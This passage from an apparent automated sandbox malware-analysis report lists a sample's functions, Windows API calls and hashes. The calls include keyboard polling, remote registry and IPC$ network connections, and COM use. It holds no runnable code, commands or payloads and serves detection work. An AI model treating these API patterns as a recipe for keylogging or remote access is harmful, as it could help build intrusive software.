                                                                                                                                                                                                                                                                                            • Opcode ID: 839f06f82355339acad970d5e7cd75b9d94fcf157b9fd3ef6c85cc86206bea4d
                                                                                                                                                                                                                                                                                            • Instruction ID: cdcb5bd98668026453a6f79c6afa3db115bce1a104da81512a7f18d5d78ddb1d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 839f06f82355339acad970d5e7cd75b9d94fcf157b9fd3ef6c85cc86206bea4d
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7811E332A8022879D720B3629C5AEFFAA7CEBC2B00F40053F7511E20E0EAB05D46D5B0
                                                                                                                                                                                                                                                                                            Function 00C7A958 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 00C7A9D9
                                                                                                                                                                                                                                                                                            • SetKeyboardState.USER32(?), ref: 00C7AA44
                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00C7AA64
                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(000000A0), ref: 00C7AA7B
                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00C7AAAA
                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(000000A1), ref: 00C7AABB
                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000011), ref: 00C7AAE7
                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(00000011), ref: 00C7AAF5
                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000012), ref: 00C7AB1E
                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(00000012), ref: 00C7AB2C
                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00C7AB55
                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(0000005B), ref: 00C7AB63
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 541375521-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 7d866bcb9a7f687671dff22393e724cbb8ea841c478936d55c4a8ddbcfa5362d
                                                                                                                                                                                                                                                                                            • Instruction ID: fc1a43b9a044b4bd2d2b588f74f4080572661f2677ea99668252b21dcf5aa25e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7d866bcb9a7f687671dff22393e724cbb8ea841c478936d55c4a8ddbcfa5362d
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3551D470A047842AEB35D7708850BAEBFB59F82384F08C599D5DA5B1C2DA649B4CCB63
                                                                                                                                                                                                                                                                                            Function 00C7662D Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 00C76649
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00C76662
                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00C766C0
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00C766D0
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00C766E2
                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00C76736
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00C76744
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00C76756
                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00C76798
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 00C767AB
                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00C767C1
                                                                                                                                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00C767CE
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3096461208-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 94d11696aa3c61ed2154ef0174caf97f845ab391a257ca7dfa299d4fb8c95fa7
                                                                                                                                                                                                                                                                                            • Instruction ID: 4ce5fc0b8497f2fddacaa2b8faf7d675063b35d6845cdabb040c0b363a1d7247
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 94d11696aa3c61ed2154ef0174caf97f845ab391a257ca7dfa299d4fb8c95fa7
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A8512071A00615AFDF18CF68CD85BAEBBB5FB48314F108129F51AE7690D770AE04CB50
                                                                                                                                                                                                                                                                                            Function 00C1146D Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C11802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C11488,?,00000000,?,?,?,?,00C1145A,00000000,?), ref: 00C11865
                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 00C11521
                                                                                                                                                                                                                                                                                            • KillTimer.USER32(00000000,?,?,?,?,00C1145A,00000000,?), ref: 00C115BB
                                                                                                                                                                                                                                                                                            • DestroyAcceleratorTable.USER32(00000000), ref: 00C529B4
                                                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00C1145A,00000000,?), ref: 00C529E2
                                                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00C1145A,00000000,?), ref: 00C529F9
                                                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00C1145A,00000000), ref: 00C52A15
                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00C52A27
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 641708696-0
                                                                                                                                                                                                                                                                                            • Opcode ID: fb5e8394b20acbee0d392347bfc897803f434b3d810dc68e32c1fa3cdb152615
                                                                                                                                                                                                                                                                                            • Instruction ID: 6c0b7cee1f939f28a406fef227d77fb1ecff4c413410c2805798e66bde3728e6
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fb5e8394b20acbee0d392347bfc897803f434b3d810dc68e32c1fa3cdb152615
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE619D35501741DFDB358F14D888B69B7F6FB82326F189018E9538BA61C778AEC4EB44
                                                                                                                                                                                                                                                                                            Function 00C12128 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C12234: GetWindowLongW.USER32(?,000000EB), ref: 00C12242
                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(0000000F), ref: 00C12152
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ColorLongWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 259745315-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 6a1d2a519952848c3787f3b27e42d8b7f0d2764a3a31d92170ecee40f4bac9c1
                                                                                                                                                                                                                                                                                            • Instruction ID: ca365b1f0e73e87b0225ad05e39ac2f4f032701a5f7d16a35cdcfd28810c05b2
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6a1d2a519952848c3787f3b27e42d8b7f0d2764a3a31d92170ecee40f4bac9c1
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2C419F79100680AFDB249B289C44BFD3775AB43375F244259FAB38B2E1C6318E92EB10
                                                                                                                                                                                                                                                                                            Function 00C7A05C Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00C60D31,00000001,0000138C,00000001,00000000,00000001,?,00C8EEAE,00CE2430), ref: 00C7A091
                                                                                                                                                                                                                                                                                            • LoadStringW.USER32(00000000,?,00C60D31,00000001), ref: 00C7A09A
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1B329: _wcslen.LIBCMT ref: 00C1B333
                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00C60D31,00000001,0000138C,00000001,00000000,00000001,?,00C8EEAE,00CE2430,?), ref: 00C7A0BC
                                                                                                                                                                                                                                                                                            • LoadStringW.USER32(00000000,?,00C60D31,00000001), ref: 00C7A0BF
                                                                                                                                                                                                                                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C7A1E0
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                                                                                                                                                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                                                                                                                                            • API String ID: 747408836-2268648507
                                                                                                                                                                                                                                                                                            • Opcode ID: a83179e5cb65146effca00750452a52c9df4857f432e865279fd996dbfb88afe
                                                                                                                                                                                                                                                                                            • Instruction ID: ddd3d3a423297f1de097a4ae20189424f36e18d24b678c86a9baad0b493e2644
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a83179e5cb65146effca00750452a52c9df4857f432e865279fd996dbfb88afe
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 76415E72800109ABCB05FBE0DD86EEEB778AF59340F504165F505B20A2EB356F89EF61
                                                                                                                                                                                                                                                                                            Function 00C70FCF Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C18577: _wcslen.LIBCMT ref: 00C1858A
                                                                                                                                                                                                                                                                                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00C71093
                                                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00C710AF
                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00C710CB
                                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00C710F5
                                                                                                                                                                                                                                                                                            • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00C7111D
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C71128
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C7112D
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                                                                                                                                                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                                                                                                                                            • API String ID: 323675364-22481851
                                                                                                                                                                                                                                                                                            • Opcode ID: d5ac630a11cb519b0224c2903446e61ae4388e34e4fb84d7be9cc503bcc45b2e
                                                                                                                                                                                                                                                                                            • Instruction ID: ae758d6a27ddd7e72efa425680ca644535ebc4c47bee238b37c2a35acb013077
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d5ac630a11cb519b0224c2903446e61ae4388e34e4fb84d7be9cc503bcc45b2e
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 79410772C10229ABCF11EBA4DC95DEEB778FF08750F448029E916A31A0EB319E45EF50
                                                                                                                                                                                                                                                                                            Function 00CA4A34 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00CA4AD9
                                                                                                                                                                                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00CA4AE0
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00CA4AF3
                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00CA4AFB
                                                                                                                                                                                                                                                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 00CA4B06
                                                                                                                                                                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 00CA4B10
                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 00CA4B1A
                                                                                                                                                                                                                                                                                            • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00CA4B30
                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00CA4B3C
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                                                                                                                                                            • String ID: static
                                                                                                                                                                                                                                                                                            • API String ID: 2559357485-2160076837
                                                                                                                                                                                                                                                                                            • Opcode ID: 6a0210a9333c75c18a3c5b5f635cb818efff9d326565ba09d1ecd494466b3e8a
                                                                                                                                                                                                                                                                                            • Instruction ID: 423419ec3a2163d8fa909d7993872b3afb4f5e8979ff0da54c4863e7fe9a46c0
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6a0210a9333c75c18a3c5b5f635cb818efff9d326565ba09d1ecd494466b3e8a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 08316071100216BBDF119FA4DC08FDE3B69FF4E369F110211FA26A61A0C775D850EB64
                                                                                                                                                                                                                                                                                            Function 00C9468D Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00C946B9
                                                                                                                                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 00C946E7
                                                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 00C946F1
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C9478A
                                                                                                                                                                                                                                                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 00C9480E
                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 00C94932
                                                                                                                                                                                                                                                                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00C9496B
                                                                                                                                                                                                                                                                                            • CoGetObject.OLE32(?,00000000,00CB0B64,?), ref: 00C9498A
                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000000), ref: 00C9499D
                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00C94A21
                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00C94A35
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 429561992-0
                                                                                                                                                                                                                                                                                            • Opcode ID: dd5cb5860f04d047193fb8e16a457ac10a70fca856c0529cde2f519e4dd3eaee
                                                                                                                                                                                                                                                                                            • Instruction ID: cb1a9392a630802180da9e74ea5a38d82f3e0d7bc4eb6a947b0b65d3b6f8e286
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dd5cb5860f04d047193fb8e16a457ac10a70fca856c0529cde2f519e4dd3eaee
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A3C123716043059F8B04DF68C888D6BB7E9FF89748F10495DF99A9B250DB30ED46CB92
                                                                                                                                                                                                                                                                                            Function 00C884DB Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 00C88538
                                                                                                                                                                                                                                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00C885D4
                                                                                                                                                                                                                                                                                            • SHGetDesktopFolder.SHELL32(?), ref: 00C885E8
                                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(00CB0CD4,00000000,00000001,00CD7E8C,?), ref: 00C88634
                                                                                                                                                                                                                                                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00C886B9
                                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(?,?), ref: 00C88711
                                                                                                                                                                                                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00C8879C
                                                                                                                                                                                                                                                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00C887BF
                                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00C887C6
                                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00C8881B
                                                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 00C88821
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2762341140-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 53268133dc6eff387e5beee3e2d6f655e95961a96875705341f70347c075a6ba
                                                                                                                                                                                                                                                                                            • Instruction ID: 9e305d91ee6ef09532abab37df0b83b7454c17575677a876e5d5b1d09f13447d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 53268133dc6eff387e5beee3e2d6f655e95961a96875705341f70347c075a6ba
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 40C12B75A00105AFDB14DFA4C888DAEBBF5FF49308B548099F41ADB661DB30EE85DB90
                                                                                                                                                                                                                                                                                            Function 00C70378 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00C7039F
                                                                                                                                                                                                                                                                                            • SafeArrayAllocData.OLEAUT32(?), ref: 00C703F8
                                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00C7040A
